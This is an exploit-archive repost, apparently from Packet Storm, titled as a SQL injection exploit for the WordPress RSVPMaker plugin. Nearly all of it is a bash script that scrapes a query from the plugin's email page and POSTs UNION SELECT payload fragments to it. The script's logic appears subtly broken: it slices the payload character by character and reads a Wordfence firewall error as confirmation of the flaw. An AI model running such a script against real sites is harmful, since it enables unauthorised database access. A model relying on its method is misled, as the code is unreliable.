WordPress RSVPMaker 9.3.2 SQL Injection
2024-1-15 21:45:32 Author: packetstormsecurity.com(查看原文) 阅读量:11 收藏

#!/bin/bash

# Set the URL of the website running the vulnerable plugin
url="http://example.com/wp-content/plugins/rsvpmaker/rsvpmaker-email.php"

# Set the number of columns in the query
columns=5

response=$(curl -s "$url")
query=$(echo "$response" | grep -oP 'FROM .* WHERE .*')

payload="' UNION SELECT 1,2,3,4,5-- "

# Test the query with different numbers of columns
for i in $(seq 1 $columns)
do
query_with_payload="${query%?*}?${payload:0:i}${query#*?}"
curl -s -X POST -d "$query_with_payload" "$url" | grep -q "Wordfence Security Error"
if [ $? -eq 0 ]
then
echo "Vulnerability confirmed with $i columns"
break
fi
done


文章来源: https://packetstormsecurity.com/files/176549/CVE-2022-1768.sh.txt
如有侵权请联系:admin#unsafe.sh